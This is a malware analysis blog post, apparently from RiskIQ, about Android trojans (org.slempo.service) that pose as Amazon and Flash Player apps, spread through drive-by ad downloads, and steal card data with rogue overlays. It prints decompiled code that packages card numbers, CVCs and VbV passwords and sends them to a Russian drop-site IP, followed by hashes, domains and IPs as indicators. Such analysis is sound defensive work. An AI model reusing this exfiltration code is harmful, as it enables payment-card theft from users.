Given the success of previous scareware tactics, mobile devices became the next logical step in the evolution of this cyber threat. Over the past two years, there have been various reports regarding an increase in mobile activity that employs rogue pop-ups that harvest user information. The same panic and impulse decision-making off which perpetrators of traditional scareware feed—along with the rapid adoption of mobile devices—helped create the perfect environment for it to thrive in the mobile space. But due to the way RiskIQ's platform works, we have a unique perspective of not only how these cyber attacks originate, but also how they are evolving and shaping user experiences. From our unique vantage point, RiskIQ has been observing this evolution and mapping out how these nefarious campaigns threaten the integrity of many mobile user experiences.
Conceptually, this activity aligns with scams that were deployed in the past. But notable reports from Malwarebytes, the Polish CERT, and FireEye [1] [2] bring specific campaigns to light that help illustrate how these mobile trojans have evolved, specifically in their ability to collect financial information and valuable credentials. These upgraded trojans also communicate with attacker-controlled infrastructure, known as a command and control servers, in order to receive instructions on where to unload the stolen information. This specified drop site is where the stolen information is warehoused and distributed throughout the criminal ecosystem.
These applications have been compromising Android devices by gaining a range of permissions that include the unauthorized use of text messages and data transmissions and sometimes controlling the user experience by performing the application overlay technique. As described by some researchers, this technique searches for applications that, for example, require a mobile user to authenticate or provide credit card details. Upon detection, the mobile trojan will generate a rogue overlay, impersonating the other application and stealing the user provided information for illicit sale or reuse.
Now let’s take a minute and dive into some of the data within our platform. A quick search for the package name org.slempo.service within our mobile application repository reveals 22 Android apps. These packages appear to be impersonating commonly used applications such as:
- Adobe Flash Player
- Adobe Flash Player Updater
- Amazon
- Google Play Updater
- MX Codec Pack
One of the example mobile packages that is attempting to impersonate an Amazon app is shown in the following screenshot from our mobile repository:
The mobile application’s metadata reveals some interesting URLs that the application communicates with and the permissions seem a bit excessive. So let’s install it to verify the permissions. The following screenshots were taken to illustrate what a user sees during the application install:
Now that looks suspicious. The application needs the ability to potentially perform a factory reset, directly call phone numbers, and send and receive SMS messages. Additionally, it would like the ability to draw over other apps and apparently this is Amazon’s first major release (version 1.0).
But what about those URLs in the metadata? A quick look at the source code of the application shows instructions to send card data to an IP address used as the drop site which is located in AS50113 (Russia):
public String getLink(){
return "hxxp://185.40.4[.]99:2080/forms/";
}
...redacted for brevity…
if (!localIterator.hasNext()){
Sender.sendCardData(this, "hxxp://185.40.4[.]99:2080/", localCard, localJSONObject, new AdditionalInformation(this.vbvPass.getText().toString(), this.oldVbvPass));
return;
}
...redacted for brevity…
public static void sendCardData(Context paramContext, String paramString, Card paramCard, JSONObject paramJSONObject, AdditionalInformation paramAdditionalInformation){
try
{
JSONObject localJSONObject1 = new JSONObject();
localJSONObject1.put("type", "card information");
JSONObject localJSONObject2 = new JSONObject();
localJSONObject2.put("number", paramCard.getNumber());
localJSONObject2.put("month", paramCard.getMonth());
localJSONObject2.put("year", paramCard.getYear());
localJSONObject2.put("cvc", paramCard.getCvc());
localJSONObject1.put("card", localJSONObject2);
localJSONObject1.put("billing address", paramJSONObject);
JSONObject localJSONObject3 = new JSONObject();
localJSONObject3.put("vbv password", paramAdditionalInformation.getVbvPass());
localJSONObject3.put("old vbv password", paramAdditionalInformation.getOldVbvPass());
localJSONObject1.put("additional information", localJSONObject3);
sendUserData(paramContext, localJSONObject1);
return;
}
The following MD5 hashes have been observed by our platform and are stored within our mobile application repository:
d300f6e167055594005c5dd9e9239e68
b4a1b3555fca501d6031bfda7a659b0a
e3ea0d652b5e153a0c64b5e1229f1000
b894dfae302b77a069c0b87e76f385ac
3176508a22af43b188fd4f7082b90e80
9cd290b73ad9f2b9957c7cf34673a40f
db9f046c8a056d7d3b89590b0d11f551
4b9678097f6f2c35f7d63368b169ceb7
b41ddea96efaf73275a2f0e986574c7d
b77fae695e54e48d85b9f6d92ec71405
2f32374846c5be06f48c59accf36a15b
6a07896567e6eb88cf99b600e91b92b8
9d0fc6ae9e3f22d9777374b1a676a986
863d455cfc3e1c89e0a34bd1323c3aec
0bbf01589cfda94828b665a013b31fe3
19970df638b5b81c9a1f1dac4b8ac676
b526cb3a500bd63f12c836303e21bb86
3a5b330e520c45d8a1ebf1f43042f0e0
288ad03cc9788c0855d446e34c7284ea
68254a72a805dceed70e1da6f84041e4
718d4452bcda0c517bca8b523637d451
1599093a330ff478b0baeee903ad4dc6
The above applications are primarily delivered through drive-by download attacks. Below is an example that was submitted to our platform by a customer scanning their ads for malware. This incident occurred on January 26th and helps illustrate the chain of events that might occur within an ad sequence:
The package in the screenshot titled ‘Update.apk’ is the actual Android application being downloaded. Additionally, the following associated domains and IP addresses were observed in relation to the above campaign:
Domains:
man5hats.ru
rghost.ru
xxxvideotube.org
adobe-flash-player-11.com
jackdojacksgot.ru
alexhost.md
xxxmobiletubez.com
brutaltube4mobile.com
gexmails.com
adobeupdate.org
brutalmobiletubes.com
updateflashplayeer.com
australiamms.com
IP Addresses:
176.123.28.128
179.60.147.21
181.174.164.25
185.86.148.188
195.3.144.90
216.58.192.14
216.58.192.46
37.1.196.207
37.1.205.155
37.1.205.200
46.101.28.84
5.196.121.148
74.125.224.2
74.125.239.102
74.125.239.104
74.125.239.110
74.125.239.128
74.125.239.132
74.125.239.134
74.125.239.136
74.125.239.32
74.125.239.36
74.125.239.37
74.125.239.38
74.125.239.39
74.125.239.40
74.125.239.41
74.125.239.46
74.125.239.98
94.102.53.184
95.211.198.23
216.58.192.46
185.40.4.99
185.40.4.99
With this new tactic in mind, RiskIQ actively encourages our customers and other mobile users to only download applications from trusted mobile app stores.